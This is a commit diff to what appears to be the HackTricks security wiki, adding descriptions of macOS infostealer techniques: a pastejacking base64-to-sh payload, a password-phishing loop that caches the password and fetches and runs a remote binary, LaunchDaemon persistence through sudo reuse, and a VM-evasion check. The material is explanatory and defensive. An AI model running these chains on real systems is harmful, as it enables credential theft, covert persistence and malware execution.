Merge pull request #1735 from HackTricks-wiki/update_2025__the_year_of_the_Infostealer_20260106_125114

2025, the year of the Infostealer

Author: carlospolop

src/generic-methodologies-and-resources/phishing-methodology/clipboard-hijacking.md

@@ -10,6 +10,10 @@ Clipboard hijacking – also known as *pastejacking* – abuses the fact that us
 
 Because **no file is downloaded and no attachment is opened**, the technique bypasses most e-mail and web-content security controls that monitor attachments, macros or direct command execution. The attack is therefore popular in phishing campaigns delivering commodity malware families such as NetSupport RAT, Latrodectus loader or Lumma Stealer.
 
+## Forced copy buttons and hidden payloads (macOS one-liners)
+
+Some macOS infostealers clone installer sites (e.g., Homebrew) and **force use of a “Copy” button** so users cannot highlight only the visible text. The clipboard entry contains the expected installer command plus an appended Base64 payload (e.g., `...; echo <b64> | base64 -d | sh`), so a single paste executes both while the UI hides the extra stage.
+
 ## JavaScript Proof-of-Concept
 
 ```html
@@ -203,5 +207,6 @@ homograph-attacks.md
 - [Pastejacking PoC – GitHub](https://github.com/dxa4481/Pastejacking)
 - [Check Point Research – Under the Pure Curtain: From RAT to Builder to Coder](https://research.checkpoint.com/2025/under-the-pure-curtain-from-rat-to-builder-to-coder/)
 - [The ClickFix Factory: First Exposure of IUAM ClickFix Generator](https://unit42.paloaltonetworks.com/clickfix-generator-first-of-its-kind/)
+- [2025, the year of the Infostealer](https://www.pentestpartners.com/security-blog/2025-the-year-of-the-infostealer/)
 
 {{#include ../../banners/hacktricks-training.md}}

src/macos-hardening/macos-auto-start-locations.md

@@ -88,6 +88,21 @@ List all the agents and daemons loaded by the current user:
 launchctl list
 ```
 
+#### Example malicious LaunchDaemon chain (password reuse)
+
+A recent macOS infostealer reused a **captured sudo password** to drop a user agent and a root LaunchDaemon:
+
+- Write the agent loop to `~/.agent` and make it executable.
+- Generate a plist in `/tmp/starter` pointing to that agent.
+- Reuse the stolen password with `sudo -S` to copy it into `/Library/LaunchDaemons/com.finder.helper.plist`, set `root:wheel`, and load it with `launchctl load`.
+- Start the agent silently via `nohup ~/.agent >/dev/null 2>&1 &` to detach output.
+
+```bash
+printf '%s\n' "$pw" | sudo -S cp /tmp/starter /Library/LaunchDaemons/com.finder.helper.plist
+printf '%s\n' "$pw" | sudo -S chown root:wheel /Library/LaunchDaemons/com.finder.helper.plist
+printf '%s\n' "$pw" | sudo -S launchctl load /Library/LaunchDaemons/com.finder.helper.plist
+nohup "$HOME/.agent" >/dev/null 2>&1 &
+```
 > [!WARNING]
 > If a plist is owned by a user, even if it's in a daemon system wide folders, the **task will be executed as the user** and not as root. This can prevent some privilege escalation attacks.
 
@@ -1793,6 +1808,10 @@ RunService ()
 - [https://github.com/cedowens/Persistent-Swift](https://github.com/cedowens/Persistent-Swift)
 - [https://github.com/D00MFist/PersistentJXA](https://github.com/D00MFist/PersistentJXA)
 
+## References
+
+- [2025, the year of the Infostealer](https://www.pentestpartners.com/security-blog/2025-the-year-of-the-infostealer/)
+
 {{#include ../banners/hacktricks-training.md}}
 
 

src/macos-hardening/macos-security-and-privilege-escalation/macos-privilege-escalation.md

@@ -209,6 +209,29 @@ killall Dock
 {{#endtab}}
 {{#endtabs}}
 
+### Password prompt phishing + sudo reuse
+
+Malware frequently abuses user interaction to **capture a sudo-capable password** and reuse it programmatically. A common flow:
+
+1. Identify the logged in user with `whoami`.
+2. **Loop password prompts** until `dscl . -authonly "$user" "$pw"` returns success.
+3. Cache the credential (e.g., `/tmp/.pass`) and drive privileged actions with `sudo -S` (password over stdin).
+
+Example minimal chain:
+
+```bash
+user=$(whoami)
+while true; do
+  read -s -p "Password: " pw; echo
+  dscl . -authonly "$user" "$pw" && break
+done
+printf '%s\n' "$pw" > /tmp/.pass
+curl -o /tmp/update https://example.com/update
+printf '%s\n' "$pw" | sudo -S xattr -c /tmp/update && chmod +x /tmp/update && /tmp/update
+```
+
+The stolen password can then be reused to **clear Gatekeeper quarantine with `xattr -c`**, copy LaunchDaemons or other privileged files, and run additional stages non-interactively.
+
 ## TCC - Root Privilege Escalation
 
 ### CVE-2020-9771 - mount_apfs TCC bypass and privilege escalation
@@ -247,6 +270,10 @@ This can be useful to escalate privileges:
 macos-files-folders-and-binaries/macos-sensitive-locations.md
 {{#endref}}
 
+## References
+
+- [2025, the year of the Infostealer](https://www.pentestpartners.com/security-blog/2025-the-year-of-the-infostealer/)
+
 {{#include ../../banners/hacktricks-training.md}}
 
 

src/macos-hardening/macos-useful-commands.md

@@ -117,6 +117,16 @@ dscacheutil -flushcache
 sudo killall -HUP mDNSResponder
 ```
 
+### Quick anti-analysis / virtualization check
+
+Some macOS stealers call `system_profiler` to detect VMs and **abort with a distinct exit code (e.g., 100)** to avoid sandbox detonation:
+
+```bash
+if system_profiler SPHardwareDataType SPDisplaysDataType | grep -Eiq 'qemu|kvm|vmware|virtualbox'; then
+  exit 100
+fi
+```
+
 ### Installed Software & Services
 
 Check for **suspicious** applications installed and **privileges** over the.installed resources:
@@ -147,6 +157,10 @@ Without prompts
 
 <figure><img src="../images/image (79).png" alt=""><figcaption></figcaption></figure>
 
+## References
+
+- [2025, the year of the Infostealer](https://www.pentestpartners.com/security-blog/2025-the-year-of-the-infostealer/)
+
 {{#include ../banners/hacktricks-training.md}}